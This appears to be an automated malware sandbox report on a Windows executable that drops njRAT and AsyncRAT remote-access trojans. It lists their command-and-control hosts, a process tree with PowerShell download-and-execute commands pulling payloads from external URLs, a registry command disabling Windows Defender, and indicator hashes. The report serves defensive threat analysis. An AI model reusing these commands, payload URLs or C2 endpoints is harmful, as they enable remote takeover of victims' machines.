Analysis
-
max time kernel
150s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
17-05-2022 13:05
General
-
Target
2691AC49A444378F3C668C7EAAF0E0E0ABF95C5C3053A.exe
-
Size
6.1MB
-
MD5
5f9e61796a21e65f9a03f92ee6a8f6d8
-
SHA1
d6032fd04db0fbb6195b6e8d31491a3fc289f1ce
-
SHA256
2691ac49a444378f3c668c7eaaf0e0e0abf95c5c3053a516b3f9a78c9a8885ba
-
SHA512
402ed4a2a376621e2674f1539c9ec6ac85b9118cb2133054ea2d960e98bf06efdd12b50f135841872450d3e07c231d2b6d8cab91315f05771226ec2546596eeb
Malware Config
Extracted
http://supportnimbuzz.hexat.com/3/Att.jpg
Extracted
https://cdn.discordapp.com/attachments/934436223181787207/937137622730559579/Att.jpg
Extracted
https://cdn.discordapp.com/attachments/935877066816114718/938236541149515816/Att.jpg
Extracted
njrat
0.7NC
NYAN CAT
ameen.myftp.biz:7788
76420c32f4f
-
reg_key
76420c32f4f
-
splitter
@!#&^%$
Extracted
njrat
0.7.3
Lime
worm.access.ly:7778
Adobe.exe
-
reg_key
Adobe.exe
-
splitter
12345
Extracted
asyncrat
0.5.7B
Default
newworld.mypsx.net:8877
AsyncMutex_6SI8OkPnk
-
delay
3
-
install
false
-
install_file
rdpclip.exe
-
install_folder
%AppData%
Signatures
-
AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
-
njRAT/Bladabindi
Widely used RAT written in .NET.
-
suricata: ET MALWARE Generic AsyncRAT Style SSL Cert
suricata: ET MALWARE Generic AsyncRAT Style SSL Cert
-
suricata: ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)
suricata: ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)
-
suricata: ET MALWARE Observed Malicious SSL Cert (AsyncRAT Server)
suricata: ET MALWARE Observed Malicious SSL Cert (AsyncRAT Server)
-
Async RAT payload 1 IoCs
-
Blocklisted process makes network request 3 IoCs
-
Executes dropped EXE 2 IoCs
-
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
-
Drops startup file 6 IoCs
-
Loads dropped DLL 8 IoCs
-
Suspicious use of SetThreadContext 3 IoCs
-
Detects Pyinstaller 3 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies registry class 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
-
Suspicious use of AdjustPrivilegeToken 44 IoCs
-
Suspicious use of WriteProcessMemory 60 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\2691AC49A444378F3C668C7EAAF0E0E0ABF95C5C3053A.exe"C:\Users\Admin\AppData\Local\Temp\2691AC49A444378F3C668C7EAAF0E0E0ABF95C5C3053A.exe"1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\WinUpdat.exeC:\Users\Admin\AppData\Local\Temp\WinUpdat.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\WinUpdat.exeC:\Users\Admin\AppData\Local\Temp\WinUpdat.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c title SMTP CRACKER V3 By ARON-TN4⤵
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\WinUpdat.vbs"2⤵
- Checks computer location settings
- Drops startup file
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -comma Invoke-Expression(New-Object Net.WebClient).DowNloAdSTRiNg.Invoke('http://supportnimbuzz.hexat.com/3/Att.jpg')"3⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"4⤵
- Drops startup file
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe"5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp4447.tmp.bat" "5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t "REG_DWORD" /d "1" /f6⤵
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lime.vbs"5⤵
- Checks computer location settings
- Drops startup file
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -comma Invoke-Expression(New-Object Net.WebClient).DowNloAdSTRiNg.Invoke('https://cdn.discordapp.com/attachments/934436223181787207/937137622730559579/Att.jpg')"6⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"7⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"7⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\asy.vbs"5⤵
- Checks computer location settings
- Drops startup file
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -comma Invoke-Expression(New-Object Net.WebClient).DowNloAdSTRiNg.Invoke('https://cdn.discordapp.com/attachments/935877066816114718/938236541149515816/Att.jpg')"6⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"7⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheFilesize
53KB
MD5becd23ad295f59cc661fff8d2a7f6e6e
SHA1f182ed8606235c7201d1d4e00edd81221d84bc98
SHA256da00a4de8172f1587d1c5321f11febe8723fbacad23a6a3404d5cfd9524892b2
SHA51225b0c9b5956b4f7d9e313013e58404f5a74d43abe2360b08b886496b8444983223d7692fa9fda9731ec61f4686283b8d9b6cf82abd25e6f4bbd274cf6517bea9
-
C:\Users\Admin\AppData\Local\Temp\WinUpdat.exeFilesize
5.8MB
MD581aabcc46ce7b6f11bb603020aa0b6a6
SHA100263d09f97b9be29f09c66b19722a70d2aff3a8
SHA2563b9f4a6c4c47ac8b8de82c05f2506af223f873bafaf8eb5f07c7f9e99634626a
SHA51206c2359c68bc17e9660c0af8a6785f1a33f343b941842d94af0b76254525ba4a2b9f79b4eb6fd0029ae147122dd0945ac1fd65f254ffb1582b0e97079e2c9a7c
-
C:\Users\Admin\AppData\Local\Temp\WinUpdat.exeFilesize
5.8MB
MD581aabcc46ce7b6f11bb603020aa0b6a6
SHA100263d09f97b9be29f09c66b19722a70d2aff3a8
SHA2563b9f4a6c4c47ac8b8de82c05f2506af223f873bafaf8eb5f07c7f9e99634626a
SHA51206c2359c68bc17e9660c0af8a6785f1a33f343b941842d94af0b76254525ba4a2b9f79b4eb6fd0029ae147122dd0945ac1fd65f254ffb1582b0e97079e2c9a7c
-
C:\Users\Admin\AppData\Local\Temp\WinUpdat.exeFilesize
5.8MB
MD581aabcc46ce7b6f11bb603020aa0b6a6
SHA100263d09f97b9be29f09c66b19722a70d2aff3a8
SHA2563b9f4a6c4c47ac8b8de82c05f2506af223f873bafaf8eb5f07c7f9e99634626a
SHA51206c2359c68bc17e9660c0af8a6785f1a33f343b941842d94af0b76254525ba4a2b9f79b4eb6fd0029ae147122dd0945ac1fd65f254ffb1582b0e97079e2c9a7c
-
C:\Users\Admin\AppData\Local\Temp\WinUpdat.vbsFilesize
545B
MD5bf83a0622f50dfe26baed65b8fb73a93
SHA14dce1e24f1a465b427d3a8afce0c9719ef7b7a73
SHA256ded94f48e84bf9d99d42fe67fd75ea6971a66b225a429e2c12295e7513ecf894
SHA5122141e65f84486bc512e36dd5ad54371f286cdb7eb5e91f0e69c7910de4fbd932755e3f422feee54a3d2d3c074433ff9cb1bc4eef6842b5d9b9451bc21c75ff0e
-
C:\Users\Admin\AppData\Local\Temp\_MEI29882\_ctypes.pydFilesize
119KB
MD5f5ec0b24dfc7952241c7a86abfb61455
SHA184176ec5d9f6d106a3ac1724539dfccb7c4c6c33
SHA2566c560fb6bac55b5b75ecd80d6f6efe797544fb6db060818f0a6e510ac5abd191
SHA51291fad0a9b3a887b227fc5e40ebd0dc2e3a37805c02185ccd91547575e02c8196c76b96ce4bcc463e9993190e3b0a67ab5c8af1f5ada557f346a194455bc83040
-
C:\Users\Admin\AppData\Local\Temp\_MEI29882\_hashlib.pydFilesize
1.6MB
MD5c94e5379dc430bc98b676260a929c1c6
SHA111305c38d58b104a2bd834925bf44930a41a416c
SHA25611e2ba61c5d94999bace0bd8af8ce75dc10c2c494ebb4120367f7fc98209b61d
SHA512d7fee1005cd3d652b6eb6c3569e7a6f3fa197982cfbe4807a7916f7d05f92bb5a2f5283ee095900dd97bc9a78981ad253792ae98fe509f78faf95c379b75bc20
-
C:\Users\Admin\AppData\Local\Temp\_MEI29882\_multiprocessing.pydFilesize
34KB
MD5243a85355713e19c26c5f3f27e9876fd
SHA1059006569bd693285ec0373724d49b23d592b2eb
SHA25632e4b466a8915a0c4cea350a24c33f487bac9e473f6120376184ef9699cdb4a6
SHA512ed1167144596d93a3dadff52f52c291b0d0be3065428fe4bdccc9f377af6c50ab85a7e3ebacd038cb7765b4f5ce19f4245d00d1e62540cf8c86ec4e8b754d962
-
C:\Users\Admin\AppData\Local\Temp\_MEI29882\_socket.pydFilesize
50KB
MD5542726bb334376b4ee0b20cb19853cbb
SHA166f88bffce320371e208b5993313b1d84e234dbf
SHA256ed53d4157e38ff8aec102a87ff7e2d6879b36eeffd301726047f7517243ab279
SHA5123bc38057f2a202808ef42f666bf1e008bebcfce41d8942b9d8dc006ea53fc8e76df012638dc5b6bf5c1a4c6175b2197308674e90cabe38711c4bfae95f0a1613
-
C:\Users\Admin\AppData\Local\Temp\_MEI29882\_ssl.pydFilesize
2.0MB
MD51b4639e2970bc4a12e0715f161c26e15
SHA169c9f8152410380ae4e2465d1711c6d577f7da96
SHA256260f8ab785e3b22c241d578a5442ff287b1bf13a886b077a105f0e85d1c3a774
SHA5122f7d9e7af93f2916978cdc90bc2553f92b7a6b8097c3c7a4247e1eb06f5c94d63ca037489d67fa8680825c1813df94f21670ae53a9fb8605d2d45ed306ce4991
-
C:\Users\Admin\AppData\Local\Temp\_MEI29882\python27.dllFilesize
3.3MB
MD53e35352c82fbccda9c372b8443f73e5e
SHA1a30a055e2e7b12c0a6d56afc1869b3b5283ac889
SHA256dce00d476314cd4c812e3b5471b84588d532d33a5f39d40c726914a893b88d07
SHA512ea852cee8aa074cf78f6e30d71f30331273c4b6eeebe16f00a04df89ff7289a39d435fbb63105daa563344e275a8c7ae9d41df96c1903e00a3a512debfc9efae
-
C:\Users\Admin\AppData\Local\Temp\_MEI29882\python27.dllFilesize
3.3MB
MD53e35352c82fbccda9c372b8443f73e5e
SHA1a30a055e2e7b12c0a6d56afc1869b3b5283ac889
SHA256dce00d476314cd4c812e3b5471b84588d532d33a5f39d40c726914a893b88d07
SHA512ea852cee8aa074cf78f6e30d71f30331273c4b6eeebe16f00a04df89ff7289a39d435fbb63105daa563344e275a8c7ae9d41df96c1903e00a3a512debfc9efae
-
C:\Users\Admin\AppData\Local\Temp\_MEI29882\select.pydFilesize
11KB
MD55659b1b9b316b0dd48556293fd2062f2
SHA10cb51157ad3655060bc3425174e6feabd8fee07a
SHA2568affe8e006052571edcc086cef04df16c18b8c4de0584b80f870933f63fcd512
SHA512f83860f5892f47d3a0a262ce175579a1a84c9ae1323a3533a5e2d695fd1da871ac96961759fde1f2dfeeecc13fd1c7c1dd2dd0c6f7d959ea467df3185d3be2e9
-
C:\Users\Admin\AppData\Local\Temp\_MEI29882\unicodedata.pydFilesize
676KB
MD5252a1e38d86c07ac3a476db9117e3453
SHA1b708dc6b672f85f57e7da7a99ef5682616cca2bf
SHA2568473ae688c862caf8f19ce6bb1bbbec1df8f44f9ddd3a9be8294a52a0d7b4d93
SHA512aaf408548f255ceff1159bb4cb77276ca840e0ea53eff84aea3c5288382c7ea2a864ed32e2481eac58478faf580552ed97190bbd6f24c74464b14d369bdc309a
-
C:\Users\Admin\AppData\Local\Temp\_MEI29~1\_ctypes.pydFilesize
119KB
MD5f5ec0b24dfc7952241c7a86abfb61455
SHA184176ec5d9f6d106a3ac1724539dfccb7c4c6c33
SHA2566c560fb6bac55b5b75ecd80d6f6efe797544fb6db060818f0a6e510ac5abd191
SHA51291fad0a9b3a887b227fc5e40ebd0dc2e3a37805c02185ccd91547575e02c8196c76b96ce4bcc463e9993190e3b0a67ab5c8af1f5ada557f346a194455bc83040
-
C:\Users\Admin\AppData\Local\Temp\_MEI29~1\_hashlib.pydFilesize
1.6MB
MD5c94e5379dc430bc98b676260a929c1c6
SHA111305c38d58b104a2bd834925bf44930a41a416c
SHA25611e2ba61c5d94999bace0bd8af8ce75dc10c2c494ebb4120367f7fc98209b61d
SHA512d7fee1005cd3d652b6eb6c3569e7a6f3fa197982cfbe4807a7916f7d05f92bb5a2f5283ee095900dd97bc9a78981ad253792ae98fe509f78faf95c379b75bc20
-
C:\Users\Admin\AppData\Local\Temp\_MEI29~1\_multiprocessing.pydFilesize
34KB
MD5243a85355713e19c26c5f3f27e9876fd
SHA1059006569bd693285ec0373724d49b23d592b2eb
SHA25632e4b466a8915a0c4cea350a24c33f487bac9e473f6120376184ef9699cdb4a6
SHA512ed1167144596d93a3dadff52f52c291b0d0be3065428fe4bdccc9f377af6c50ab85a7e3ebacd038cb7765b4f5ce19f4245d00d1e62540cf8c86ec4e8b754d962
-
C:\Users\Admin\AppData\Local\Temp\_MEI29~1\_socket.pydFilesize
50KB
MD5542726bb334376b4ee0b20cb19853cbb
SHA166f88bffce320371e208b5993313b1d84e234dbf
SHA256ed53d4157e38ff8aec102a87ff7e2d6879b36eeffd301726047f7517243ab279
SHA5123bc38057f2a202808ef42f666bf1e008bebcfce41d8942b9d8dc006ea53fc8e76df012638dc5b6bf5c1a4c6175b2197308674e90cabe38711c4bfae95f0a1613
-
C:\Users\Admin\AppData\Local\Temp\_MEI29~1\_ssl.pydFilesize
2.0MB
MD51b4639e2970bc4a12e0715f161c26e15
SHA169c9f8152410380ae4e2465d1711c6d577f7da96
SHA256260f8ab785e3b22c241d578a5442ff287b1bf13a886b077a105f0e85d1c3a774
SHA5122f7d9e7af93f2916978cdc90bc2553f92b7a6b8097c3c7a4247e1eb06f5c94d63ca037489d67fa8680825c1813df94f21670ae53a9fb8605d2d45ed306ce4991
-
C:\Users\Admin\AppData\Local\Temp\_MEI29~1\select.pydFilesize
11KB
MD55659b1b9b316b0dd48556293fd2062f2
SHA10cb51157ad3655060bc3425174e6feabd8fee07a
SHA2568affe8e006052571edcc086cef04df16c18b8c4de0584b80f870933f63fcd512
SHA512f83860f5892f47d3a0a262ce175579a1a84c9ae1323a3533a5e2d695fd1da871ac96961759fde1f2dfeeecc13fd1c7c1dd2dd0c6f7d959ea467df3185d3be2e9
-
C:\Users\Admin\AppData\Local\Temp\_MEI29~1\unicodedata.pydFilesize
676KB
MD5252a1e38d86c07ac3a476db9117e3453
SHA1b708dc6b672f85f57e7da7a99ef5682616cca2bf
SHA2568473ae688c862caf8f19ce6bb1bbbec1df8f44f9ddd3a9be8294a52a0d7b4d93
SHA512aaf408548f255ceff1159bb4cb77276ca840e0ea53eff84aea3c5288382c7ea2a864ed32e2481eac58478faf580552ed97190bbd6f24c74464b14d369bdc309a
-
C:\Users\Admin\AppData\Local\Temp\tmp4447.tmp.batFilesize
119B
MD578645ad9e97d2b5f440e02959d9a1985
SHA163aae2a1e9a2a346a02faef58552449e25bfca0b
SHA25683a149d70fcae8ce1bc42082383d09c98141673df509351294f40bb1cb77177d
SHA5122b6141e0570fb1d44bf9fd5d7dff987ea97f46d58448d4549a5efb9876a9adb8c061c759fb9b0c6be68207df64633f5a7355949597aa5da2aac5a9b7d65de0bf
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\asy.vbsFilesize
588B
MD5880809017832980744786ecbc274effe
SHA1b6666c017db09f7b3cb5476856da7876e5aee21f
SHA256405e07fcf42a523a61c0327e5c4bc8de2670c0908b1e11d4c70da4ed09ab48d3
SHA5128183a3ce7b20a32ffa18bc1d57da2fd41d2afcc9e91ef2e2b715f4dd3e463bf2aebcfaaccb05f5f60603ac441dee70a1ffde599a39ff904c7d3f3d79151e4453
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lime.vbsFilesize
588B
MD54713b5f2358531618f549cad3f13caf5
SHA1970dabe057d37660fab8b718b95436e2819f6736
SHA2566ecbb71bb676c299ffb51c83e2b4bed006bebcb9301c517099397abf24db26e3
SHA512a372b4bb4b3cbb2dd4ad8609784e45b15e841913a82f6aef8d883cfe6efdb2d78c70879079382393d31bcb004b770ccf7d95831142e89724b9d42e1adffaaee9
-
memory/220-133-0x0000000000000000-mapping.dmp
-
memory/744-185-0x0000000000000000-mapping.dmp
-
memory/1248-189-0x0000000000000000-mapping.dmp
-
memory/1316-182-0x0000000000000000-mapping.dmp
-
memory/1460-187-0x0000000000000000-mapping.dmp
-
memory/2164-181-0x0000000000000000-mapping.dmp
-
memory/2988-130-0x0000000000000000-mapping.dmp
-
memory/3384-148-0x0000000000000000-mapping.dmp
-
memory/3548-147-0x0000000000000000-mapping.dmp
-
memory/3832-162-0x0000000007A00000-0x000000000807A000-memory.dmpFilesize
6.5MB
-
memory/3832-152-0x00000000052A0000-0x00000000058C8000-memory.dmpFilesize
6.2MB
-
memory/3832-150-0x0000000000000000-mapping.dmp
-
memory/3832-151-0x0000000004AB0000-0x0000000004AE6000-memory.dmpFilesize
216KB
-
memory/3832-164-0x00000000076C0000-0x000000000775C000-memory.dmpFilesize
624KB
-
memory/3832-168-0x00000000077B0000-0x00000000077E2000-memory.dmpFilesize
200KB
-
memory/3832-169-0x00000000741F0000-0x000000007423C000-memory.dmpFilesize
304KB
-
memory/3832-170-0x0000000070280000-0x00000000705D4000-memory.dmpFilesize
3.3MB
-
memory/3832-171-0x0000000007790000-0x00000000077AE000-memory.dmpFilesize
120KB
-
memory/3832-172-0x00000000078F0000-0x00000000078FA000-memory.dmpFilesize
40KB
-
memory/3832-173-0x0000000009080000-0x0000000009116000-memory.dmpFilesize
600KB
-
memory/3832-174-0x0000000007950000-0x000000000795E000-memory.dmpFilesize
56KB
-
memory/3832-175-0x00000000079A0000-0x00000000079BA000-memory.dmpFilesize
104KB
-
memory/3832-176-0x0000000007990000-0x0000000007998000-memory.dmpFilesize
32KB
-
memory/3832-157-0x00000000050D0000-0x00000000050F2000-memory.dmpFilesize
136KB
-
memory/3832-178-0x00000000091A0000-0x0000000009216000-memory.dmpFilesize
472KB
-
memory/3832-158-0x00000000059D0000-0x0000000005A36000-memory.dmpFilesize
408KB
-
memory/3832-159-0x0000000005A40000-0x0000000005AA6000-memory.dmpFilesize
408KB
-
memory/3832-163-0x00000000073C0000-0x00000000073DA000-memory.dmpFilesize
104KB
-
memory/3832-161-0x0000000006660000-0x00000000066A4000-memory.dmpFilesize
272KB
-
memory/3832-160-0x0000000006100000-0x000000000611E000-memory.dmpFilesize
120KB
-
memory/3840-192-0x0000000000000000-mapping.dmp
-
memory/3896-194-0x0000000000000000-mapping.dmp
-
memory/4176-165-0x0000000000000000-mapping.dmp
-
memory/4176-177-0x0000000005400000-0x0000000005492000-memory.dmpFilesize
584KB
-
memory/4176-167-0x00000000057C0000-0x0000000005D64000-memory.dmpFilesize
5.6MB
-
memory/4176-166-0x0000000000400000-0x000000000040C000-memory.dmpFilesize
48KB
-
memory/4176-179-0x0000000005330000-0x000000000533A000-memory.dmpFilesize
40KB
-
memory/4176-180-0x000000000B1E0000-0x000000000B202000-memory.dmpFilesize
136KB
-
memory/4300-190-0x0000000000000000-mapping.dmp
-
memory/4300-191-0x0000000000400000-0x000000000041A000-memory.dmpFilesize
104KB
-
memory/4348-184-0x0000000000000000-mapping.dmp
-
memory/4700-195-0x0000000000000000-mapping.dmp
-
memory/4700-196-0x0000000000400000-0x0000000000412000-memory.dmpFilesize
72KB